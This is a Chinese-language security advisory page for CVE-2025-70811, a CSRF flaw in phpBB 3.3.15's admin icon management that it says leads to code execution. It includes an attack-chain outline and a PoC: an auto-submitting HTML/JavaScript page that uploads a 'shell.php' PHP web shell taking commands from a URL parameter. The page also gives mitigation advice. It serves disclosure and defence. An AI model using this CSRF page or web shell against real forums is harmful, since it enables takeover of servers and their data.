IPBUF安全漏洞报告
English
CVE-2025-70811 CVSS 4.3 中危

CVE-2025-70811 phpBB CSRF致代码执行漏洞

披露日期: 2026-04-09

漏洞信息

漏洞编号
CVE-2025-70811
漏洞类型
跨站请求伪造 (CSRF)
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
phpBB 3.3.15

相关标签

CSRFRCEphpBBWeb安全CVE-2025-70811

漏洞概述

phpBB 3.3.15版本存在跨站请求伪造(CSRF)漏洞。该漏洞源于管理控制面板(ACP)中的图标管理功能缺乏足够的CSRF防护机制。攻击者可以通过诱导拥有管理员权限的用户访问特制的恶意链接,利用该受害者的会话权限在后台执行未授权的操作。利用此漏洞,攻击者最终可以在服务器上执行任意代码,从而完全控制受影响的系统。该漏洞的CVSS评分为4.3,属于中危级别,需要管理员及时关注并修复。

技术细节

该漏洞的技术原理在于phpBB 3.3.15管理后台的“图标管理”模块未对关键状态修改请求进行有效的CSRF令牌验证。在攻击场景中,攻击者首先构造一个包含恶意HTML表单的页面,该表单被配置为自动向目标phpBB后台的图标管理接口发送POST请求。当已登录的管理员浏览此页面时,浏览器会自动附带其有效的管理员Session Cookie发起请求。由于服务器端未严格校验请求来源的合法性或缺少Token验证,导致攻击者能够成功劫持管理员会话。通过利用图标管理功能提供的上传或配置接口,攻击者可以上传包含恶意代码的伪装图片文件,或修改路径配置指向服务器上的恶意脚本,从而在服务器端实现任意代码执行。此过程需要网络访问且依赖于诱导用户交互,但利用成功后危害较大。

攻击链分析

STEP 1
侦察
攻击者识别出目标网站使用的是存在漏洞的phpBB 3.3.15版本。
STEP 2
构造载荷
攻击者编写包含恶意HTML/JavaScript的CSRF页面,针对ACP图标管理功能设计POST请求。
STEP 3
诱导访问
攻击者通过钓鱼邮件或社交工程手段,诱导已登录的管理员访问恶意链接。
STEP 4
执行攻击
管理员浏览器在后台自动发送请求,服务器执行恶意代码,导致服务器被控制。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- Proof of Concept for CVE-2025-70811 --> <!-- Exploit CSRF in ACP Icon Management --> <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://target-site/phpBB/adm/index.php?i=acp_icons&mode=icons&action=add", true); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundary"); // Payload to upload malicious icon or modify settings var body = "------WebKitFormBoundary\r\n"; body += "Content-Disposition: form-data; name=\"icon\"; filename=\"shell.php\"\r\n"; body += "Content-Type: image/jpeg\r\n\r\n"; body += "<?php system($_GET['cmd']); ?>\r\n"; body += "------WebKitFormBoundary--\r\n"; xhr.send(body); } // Auto trigger on load window.onload = submitRequest; </script> </body> </html>

影响范围

phpBB 3.3.15

防御指南

临时缓解措施
建议管理员立即检查当前phpBB版本,若受影响应尽快升级修复。在无法立即升级的情况下,应限制管理后台仅通过VPN或特定IP访问,并要求管理员在使用完毕后立即登出,以降低CSRF攻击风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表